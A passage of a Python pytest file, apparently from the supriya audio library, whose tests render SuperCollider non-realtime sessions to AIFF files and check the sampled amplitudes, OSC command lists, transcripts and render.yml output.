render_directory_path=nonrealtime_paths.render_directory_path
)
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert (
pathlib.Path(nonrealtime_paths.render_directory_path)
in output_file_path.parents
)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
def test_00c(nonrealtime_paths):
"""
No input, no output file path specified, no render path specified,
output already exists.
"""
session = pytest.helpers.make_test_session()
osc_path = pathlib.Path().joinpath(
supriya.output_path, "session-7b3f85710f19667f73f745b8ac8080a0.osc"
)
aiff_path = pathlib.Path().joinpath(
supriya.output_path, "session-7b3f85710f19667f73f745b8ac8080a0.aiff"
)
if osc_path.exists():
osc_path.unlink()
if aiff_path.exists():
aiff_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
executable = os.environ.get("SCSYNTH_PATH", "scsynth")
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Wrote session-7b3f85710f19667f73f745b8ac8080a0.osc.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
f" Command: {executable} -N session-7b3f85710f19667f73f745b8ac8080a0.osc _ session-7b3f85710f19667f73f745b8ac8080a0.aiff 44100 aiff int24",
" Rendered session-7b3f85710f19667f73f745b8ac8080a0.osc with exit code 0.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. File already exists.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. Output already exists.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
osc_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Wrote session-7b3f85710f19667f73f745b8ac8080a0.osc.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. Output already exists.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
aiff_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. File already exists.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
f" Command: {executable} -N session-7b3f85710f19667f73f745b8ac8080a0.osc _ session-7b3f85710f19667f73f745b8ac8080a0.aiff 44100 aiff int24",
" Rendered session-7b3f85710f19667f73f745b8ac8080a0.osc with exit code 0.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
def test_01(nonrealtime_paths):
"""
No input.
"""
session = pytest.helpers.make_test_session()
synthdef = pytest.helpers.build_dc_synthdef(8)
assert synthdef.anonymous_name == "b47278d408f17357f6b260ec30ea213d"
assert session.to_lists() == [
[
0.0,
[
["/d_recv", synthdef.compile()],
["/s_new", "b47278d408f17357f6b260ec30ea213d", 1000, 0, 0, "source", 0],
],
],
[2.0, [["/n_set", 1000, "source", 0.25]]],
[4.0, [["/n_set", 1000, "source", 0.5]]],
[6.0, [["/n_set", 1000, "source", 0.75]]],
[8.0, [["/n_set", 1000, "source", 1.0]]],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-7b3f85710f19667f73f745b8ac8080a0
source: null
"""
)
def test_02(nonrealtime_paths):
"""
Soundfile NRT input, matched channels.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session(input_=path_one)
synthdef = pytest.helpers.build_multiplier_synthdef(8)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-34a8138953258b32d05ed6e09ebdf5b7
source: null
"""
)
def test_03(nonrealtime_paths):
"""
Soundfile NRT input, mismatched channels.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session(
input_=path_one, input_bus_channel_count=2, output_bus_channel_count=4
)
synthdef = pytest.helpers.build_multiplier_synthdef(4)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"1d83a887914f0ac8ac3de461f4cc637c",
1000,
0,
0,
"in_bus",
4,
"multiplier",
-0.5,
"out_bus",
0,
],
],
],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 4)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-f90a25f63698e1c8c4f6fe63d7d87bc4
source: null
"""
)
def test_04(nonrealtime_paths):
"""
Session NRT input, matched channels.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(input_=session_one, name="outer-session")
synthdef = pytest.helpers.build_multiplier_synthdef(8)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1000,
0,
0,
"in_bus",
8,
"multiplier",
-0.5,
"out_bus",
0,
],
],
],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-0038ce94f2ab7825919c1b5e1d5f2e82
source:
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_05(nonrealtime_paths):
"""
Soundfile DiskIn input.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session()
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(path_one, duration=10)
session_two.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=10)
print(path_one)
pprint.pprint(session_one.to_lists())
print(path_two)
pprint.pprint(session_two.to_lists())
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_read", 0, str(path_one), 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[10.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
# NOTE: Render YML is not portable across systems.
# Do not verify its output.
assert nonrealtime_paths.render_yml_file_path.exists()
def test_06(nonrealtime_paths):
"""
Session DiskIn input.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(name="outer-session")
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(session_one, duration=10)
session_two.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=10)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 8],
[
"/b_read",
0,
"session-7b3f85710f19667f73f745b8ac8080a0.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[10.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-fbd50fbec743e7758481debe0450f38c
source:
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_07(nonrealtime_paths):
"""
Chained Session DiskIn input.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(name="middle-session")
session_three = supriya.nonrealtime.Session(name="outer-session")
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
multiplier_synthdef = pytest.helpers.build_multiplier_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(session_one, duration=10)
synth = session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_, duration=10
)
synth.add_synth(
add_action="ADD_AFTER",
duration=10,
synthdef=multiplier_synthdef,
multiplier=-1.0,
)
with session_three.at(0):
buffer_ = session_three.cue_soundfile(session_two, duration=10)
synth = session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_, duration=10
)
synth.add_synth(
add_action="ADD_AFTER",
duration=10,
synthdef=multiplier_synthdef,
multiplier=-0.5,
)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[diskin_synthdef, multiplier_synthdef]
)
buffer_one_name = "session-7b3f85710f19667f73f745b8ac8080a0.aiff"
assert session_two.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/b_alloc", 0, 32768, 8],
["/b_read", 0, buffer_one_name, 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1001,
3,
1000,
"multiplier",
-1.0,
],
],
],
[10.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
buffer_two_name = "session-a9bccd241b0e5b56d123924992fbdc05.aiff"
assert session_three.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/b_alloc", 0, 32768, 8],
["/b_read", 0, buffer_two_name, 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1001,
3,
1000,
"multiplier",
-0.5,
],
],
],
[10.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
buffer_one_path = nonrealtime_paths.render_directory_path / buffer_one_name
buffer_two_path = nonrealtime_paths.render_directory_path / buffer_two_name
assert not buffer_one_path.exists()
assert not buffer_two_path.exists()
exit_code, _ = session_three.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(buffer_one_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(buffer_one_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
pytest.helpers.assert_soundfile_ok(buffer_two_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(buffer_two_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.41: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.61: [-0.75, -0.75, -0.75, -0.75, -0.75, -0.75, -0.75, -0.75],
0.81: [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0],
0.99: [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0],
}
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.41: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.61: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.81: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.99: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-5657353b9c5dcd1e807fb6bf9919e1f4
source:
- session-a9bccd241b0e5b56d123924992fbdc05
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_08(nonrealtime_paths):
"""
Fanned Session DiskIn input and NRT input.
"""
session_one = pytest.helpers.make_test_session(multiplier=0.25)
session_two = supriya.nonrealtime.Session(name="middle-session")
session_three = supriya.nonrealtime.Session(name="outer-session")
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_one = session_two.cue_soundfile(session_one, duration=10)
buffer_two = session_two.cue_soundfile(session_one, duration=10)
session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_one, duration=10
)
session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_two, duration=10
)
with session_three.at(0):
buffer_one = session_three.cue_soundfile(session_one, duration=10)
buffer_two = session_three.cue_soundfile(session_two, duration=10)
session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_one, duration=10
)
session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_two, duration=10
)
assert session_one.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(pytest.helpers.build_dc_synthdef(8).compile())],
["/s_new", "b47278d408f17357f6b260ec30ea213d", 1000, 0, 0, "source", 0],
],
],
[2.0, [["/n_set", 1000, "source", 0.0625]]],
[4.0, [["/n_set", 1000, "source", 0.125]]],
[6.0, [["/n_set", 1000, "source", 0.1875]]],
[8.0, [["/n_set", 1000, "source", 0.25]]],
[10.0, [["/n_free", 1000], [0]]],
]
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_alloc", 1, 32768, 8],
[
"/b_read",
0,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/b_read",
1,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1001,
0,
0,
"buffer_id",
1,
],
],
],
[
10.0,
[
["/n_free", 1000, 1001],
["/b_close", 0],
["/b_free", 0],
["/b_close", 1],
["/b_free", 1],
[0],
],
],
]
assert session_three.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_alloc", 1, 32768, 8],
[
"/b_read",
0,
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff",
0,
-1,
0,
1,
],
[
"/b_read",
1,
"session-81d02f16aff7797ca3ac041facb61b95.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1001,
0,
0,
"buffer_id",
1,
],
],
],
[
10.0,
[
["/n_free", 1000, 1001],
["/b_close", 0],
["/b_free", 0],
["/b_close", 1],
["/b_free", 1],
[0],
],
],
]
session_one_path = nonrealtime_paths.render_directory_path.joinpath(
"session-c6d86f3d482a8bac1f7cc6650017da8e.aiff"
)
session_two_path = nonrealtime_paths.render_directory_path.joinpath(
"session-81d02f16aff7797ca3ac041facb61b95.aiff"
)
exit_code, _ = session_three.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(session_one_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(session_one_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625],
0.41: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.61: [0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875],
0.81: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.99: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
}
pytest.helpers.assert_soundfile_ok(session_two_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(session_two_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125],
0.41: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.61: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.81: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.99: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
}
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875, 0.1875],
0.41: [0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375],
0.61: [0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625],
0.81: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.99: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
}
executable = os.environ.get("SCSYNTH_PATH", "scsynth")
assert session_three.transcript == [
"Writing session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
" Wrote session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
"Rendering session-c6d86f3d482a8bac1f7cc6650017da8e.osc.",
f" Command: {executable} -N session-c6d86f3d482a8bac1f7cc6650017da8e.osc _ session-c6d86f3d482a8bac1f7cc6650017da8e.aiff 44100 aiff int24",
" Rendered session-c6d86f3d482a8bac1f7cc6650017da8e.osc with exit code 0.",
"Writing session-81d02f16aff7797ca3ac041facb61b95.osc.",
" Wrote session-81d02f16aff7797ca3ac041facb61b95.osc.",
"Rendering session-81d02f16aff7797ca3ac041facb61b95.osc.",
f" Command: {executable} -N session-81d02f16aff7797ca3ac041facb61b95.osc _ session-81d02f16aff7797ca3ac041facb61b95.aiff 44100 aiff int24",
" Rendered session-81d02f16aff7797ca3ac041facb61b95.osc with exit code 0.",
"Writing session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
" Wrote session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
"Rendering session-1d80bd5d7da1eb8c25d322aa85384513.osc.",
f" Command: {executable} -N session-1d80bd5d7da1eb8c25d322aa85384513.osc _ session-1d80bd5d7da1eb8c25d322aa85384513.aiff 44100 aiff int24",
" Rendered session-1d80bd5d7da1eb8c25d322aa85384513.osc with exit code 0.",
"Writing output/render.yml.",
" Wrote output/render.yml.",
]
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-1d80bd5d7da1eb8c25d322aa85384513
source:
- session-81d02f16aff7797ca3ac041facb61b95
- session-c6d86f3d482a8bac1f7cc6650017da8e
"""
)
def test_09(nonrealtime_paths):
"""
